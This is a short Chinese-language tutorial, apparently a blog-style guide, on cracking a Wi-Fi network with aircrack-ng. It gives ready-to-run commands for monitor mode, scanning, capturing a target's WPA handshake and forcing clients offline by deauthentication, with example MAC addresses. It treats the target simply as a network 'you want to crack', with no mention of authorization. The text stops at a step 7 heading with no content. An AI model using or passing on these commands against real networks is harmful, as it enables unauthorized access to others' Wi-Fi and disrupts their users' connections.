1、接入一块外置的无线网卡。
2、查看可用的wifi接口,回显结果中有wlan0即代表支持监控模式
airmon-ng
3、开启无线网卡监控模式
airmon-ng start wlan0
命令执行后网卡接口变为wlan0mon
4、查看wifi网络
airodump-ng wlan0mon
命令执行后会把周围的无线网络按照信号强度由上到下排列到一个列表,当列表中出现你想要破解的wifi网络后,按CTRL+C停止 。
5、抓取握手包
airodump-ng --bssid AP‘s mac -c channel -w capfile wlan0mon
airodump-ng --bssid 94:77:2B:20:DD:B4 -c 8 -w cap wlan0mon
6、强制设备下线
IEEE802.11简称WIFI协议,协议设计当初就包含解除认证帧的规定,目的用来通知站点WIFI已断开,但是由于设计缺陷,很容易被Wi-Fi deauthentication attack,简称反认证攻击(deauth),发动攻击不需要加密帧数据包,只需要嗅探到连接接入点的设备MAC地址就可发动攻击,最新的802.11w协议修复了此问题。
执行:
aireplay-ng -0 2 -a {BSSID} -c {MAC} wlan0mon
aireplay-ng -0 2 -a 94:77:2B:20:DD:B4 -c 74:60:FA:3A:4D:06 wlan0mon
BSSID是步骤3中要破解的wifi信息,MAC是步骤4中获取到的设备STATION信息。
7、查看抓到的握手包
